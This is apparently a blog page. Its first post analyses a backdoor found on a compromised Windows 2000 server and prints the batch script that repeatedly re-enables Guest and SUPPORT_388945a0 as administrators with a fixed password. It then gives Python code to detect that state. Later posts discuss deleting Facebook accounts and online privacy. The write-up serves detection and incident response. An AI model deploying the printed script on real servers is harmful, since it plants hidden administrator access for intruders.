Malicious Backdoor Batch Script Re-Enables Privileged Guest and Support Accounts on Windows Servers
I recently came across a Windows 2000 server that was found to have been compromised. During the investigation, both the Guest and Support_388945a0 accounts were found to have been placed in the Administrators and Remote Desktop Users groups (the server was internet facing). Things got interesting, however, when we removed these accounts from those groups and disabled them both. After logging back in a short while later, both the Guest and Support accounts had been re-enabled and put back into the Admins and RDP groups.
When going to check the Windows hosts file to make sure no modifications had been made to it, the following suspicious files were found in %systemroot%\system32\drivers\etc\:
1.exe
2.exe
gm.dls
gmreadme
logoff.exe
netstat.exe
query.exe
t.msc
ts.exe
After some analysis, none of these files were found to be inherently malicious; they are instead used by a malicious batch script to enable the Guest and Support accounts with a specific password and add them to the Admins and RDP groups. The 1.exe file, for example, is just an executable with account-management capabilities.
In C:\WINDOWS\Application Compatibility Scripts\Install\Template there was a batch script called “.bat” with the following contents:
@cd %systemroot%\system32\drivers\etc\
@1 localgroup "Remote Desktop Users" SUPPORT_388945a0 /add
@1 localgroup "Remote Desktop Users" guest /add
@1 user guest QQqqaa123321
@1 user guest QQqqaa123321 /add
@1 localgroup administrators guest /add
@1 user guest /active:yes
@1 user SUPPORT_388945a0 QQqqaa123321
@1 user SUPPORT_388945a0 QQqqaa123321 /add
@1 localgroup administrators SUPPORT_388945a0 /add
@1 user SUPPORT_388945a0 /active:yes
At this point it’s fairly evident what’s going on: this batch script is being run periodically and invokes 1.exe to ensure that both the Guest and Support_388945a0 accounts are present and in the Administrators and Remote Desktop Users groups. It also sets the password of both accounts to ‘QQqqaa123321’. If you find these files on your system, consider that server compromised. Remove the files and disable those accounts in the first instance, but a full rebuild is highly recommended to rule out the possibility of other backdoors or rootkits.
These types of batch scripts are not uncommon for backdoor trojans. However, I couldn’t find any references to this particular backdoor, so thought I would post about this in case anyone else searches for information about it. Note that at the time of writing, this batch script is not picked up by any anti-virus software.
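Since anti-virus does not flag the script, the practical check is to look for its effects directly: the two accounts being enabled or sitting in a privileged group, and the helper files sitting in drivers\etc. The following is an added example, not code from the original post; it parses the text that `net localgroup <group>` and `net user <name>` print on Windows (the sample output below is constructed to mirror that format, and the account, group and file names come from the post) so it can be run offline against captured output or wired to `subprocess` on a live host.

```python
"""Check captured `net` command output and a drivers\\etc listing for the
persistence state left behind by the backdoor batch script (added example)."""
import re
from typing import Dict, Iterable, List

# Accounts and groups the batch script re-enables and elevates (from the post).
SUSPECT_ACCOUNTS = {"guest", "support_388945a0"}
PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}
# File names found next to the hosts file in %systemroot%\system32\drivers\etc (from the post).
INDICATOR_FILES = {"1.exe", "2.exe", "gm.dls", "gmreadme", "logoff.exe",
                   "netstat.exe", "query.exe", "t.msc", "ts.exe"}


def parse_localgroup_members(output: str) -> List[str]:
    """Return member names from `net localgroup <group>` output.

    Members are listed one per line after the dashed separator, up to the
    closing 'The command completed successfully.' line."""
    members: List[str] = []
    in_members = False
    for line in output.splitlines():
        stripped = line.strip()
        if not in_members:
            in_members = stripped.startswith("----")
            continue
        if stripped.startswith("The command completed"):
            break
        if stripped:
            members.append(stripped)
    return members


def account_is_active(output: str) -> bool:
    """Read the 'Account active' field of `net user <name>` output."""
    match = re.search(r"^Account active\s+(\w+)", output, re.MULTILINE)
    return bool(match) and match.group(1).lower() == "yes"


def find_backdoor_state(localgroup_outputs: Dict[str, str],
                        user_outputs: Dict[str, str]) -> List[str]:
    """Return findings for suspect accounts that are enabled or sit in a
    privileged group; an empty list means the checked state is clean."""
    findings: List[str] = []
    for group, output in localgroup_outputs.items():
        if group.lower() not in PRIVILEGED_GROUPS:
            continue
        for member in parse_localgroup_members(output):
            if member.lower() in SUSPECT_ACCOUNTS:  # Windows names are case-insensitive
                findings.append(f"{member} is a member of {group}")
    for user, output in user_outputs.items():
        if user.lower() in SUSPECT_ACCOUNTS and account_is_active(output):
            findings.append(f"{user} is enabled")
    return findings


def find_indicator_files(listing: Iterable[str]) -> List[str]:
    """Return names from a drivers\\etc listing that match the indicator set.
    Names like netstat.exe are legitimate in system32; the point is the location."""
    return [name for name in listing if name.lower() in INDICATOR_FILES]


# Constructed sample output modelled on `net localgroup` / `net user` on a compromised host.
SAMPLE_LOCALGROUPS = {
    "Administrators": (
        "Alias name     administrators\n"
        "Comment        Administrators have complete and unrestricted access\n"
        "\nMembers\n\n"
        "-------------------------------------------------------------------------------\n"
        "Administrator\nGuest\nSUPPORT_388945a0\n"
        "The command completed successfully.\n"
    ),
    "Remote Desktop Users": (
        "Alias name     Remote Desktop Users\n"
        "Comment        Members in this group are granted the right to logon remotely\n"
        "\nMembers\n\n"
        "-------------------------------------------------------------------------------\n"
        "Guest\n"
        "The command completed successfully.\n"
    ),
}
SAMPLE_USERS = {
    "Guest": "User name                    Guest\nAccount active               Yes\n",
    "SUPPORT_388945a0": "User name                    SUPPORT_388945a0\nAccount active               No\n",
}
SAMPLE_ETC_LISTING = ["hosts", "lmhosts.sam", "networks", "protocol",
                      "services", "1.exe", "t.msc", "netstat.exe"]


if __name__ == "__main__":
    for finding in find_backdoor_state(SAMPLE_LOCALGROUPS, SAMPLE_USERS):
        print("FINDING:", finding)
    for name in find_indicator_files(SAMPLE_ETC_LISTING):
        print("INDICATOR FILE in drivers\\etc:", name)
```

On a live host, feed the functions the stdout of `net localgroup Administrators`, `net localgroup "Remote Desktop Users"`, `net user Guest`, `net user SUPPORT_388945a0` and a listing of the drivers\etc directory; any finding after you have already disabled the accounts means the scheduled script is still running and the box needs the rebuild the post recommends.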
How To Delete Your Account on 14 Popular Websites
A few months ago I posted about Facebook’s ever-so-slightly simplified account deletion process. I just stumbled across an article on Smashing Magazine that describes how to delete one’s account on 14 popular websites.
Here are the relevant links for the following sites:
Facebook (Delete Account page)
MySpace (people still use this?)
Windows Live (“Close your account” at the bottom)
Facebook (finally) adds ability to delete accounts
Facebook has finally added the ability to actually delete – not just deactivate – one’s account. Until now, the only (easy) option has been to ‘deactivate’ your account, which simply removes you from searches and prevents you from logging in (although you can very quickly re-activate). I say ‘easy’, as there did exist a very convoluted delete process. That said, however, they still don’t seem to have made the delete option available to everyone – or they’ve made it particularly hard to find – as I still seem to be stuck with ‘deactivate’.
Even if you can’t find the option in your Facebook settings, you can delete your account by visiting this page (confirmation required) which states:
If you do not think you will use Facebook again and would like your account deleted, we can take care of this for you. Keep in mind that you will not be able to reactivate your account or retrieve any of the content or information you have added. If you would like your account deleted, then click “Submit.”
After submitting an account deletion request you will receive an email informing you that your account will be deleted in 14 days (unless you log back in). Note that if you have your Twitter or YouTube accounts linked to Facebook, then an update from either of these within the 14-day period will also abort the deletion process.
This is in contrast to just deactivating which, as described on Facebook’s deactivation page:
Even after you deactivate, your friends can still invite you to events, tag you in photos, or ask you to join groups.
… so much for ‘deactivation’.
It should probably be noted that although deleting your account will probably automatically remove any content you’ve posted on Facebook, they still reserve the right to retain your information, and you can also be certain that everything you’ve ever posted or done on the site will remain in the slews of hourly backups that are performed and undoubtedly retained for a couple of years. There’s no way they are going to go to the effort of clearing their backups of deleted accounts (also, that information is worth far too much to them to delete).
The following extract from Facebook’s Privacy Policy outlines the limitations of such account removals:
Even after you remove information from your profile or delete your account, copies of that information may remain viewable elsewhere to the extent it has been shared with others, it was otherwise distributed pursuant to your privacy settings, or it was copied or stored by other users. However, your name will no longer be associated with that information on Facebook. (For example, if you post something to another user’s profile and then you delete your account, that post may remain, but be attributed to an “Anonymous Facebook User.”) Additionally, we may retain certain information to prevent identity theft and other misconduct even if deletion has been requested. If you have given third party applications or websites access to your information, they may retain your information to the extent permitted under their terms of service or privacy policies. But they will no longer be able to access the information through our Platform after you disconnect from them.
Despite my strong views towards privacy, I’m not a complete Facebook hater; it does have its uses and I do have a (very spartan) account there. I just want to help highlight the potential risks and issues associated with the rapid increase in recent online information disclosure and unfortunately the only way to win this particular privacy game… is to avoid playing in the first place.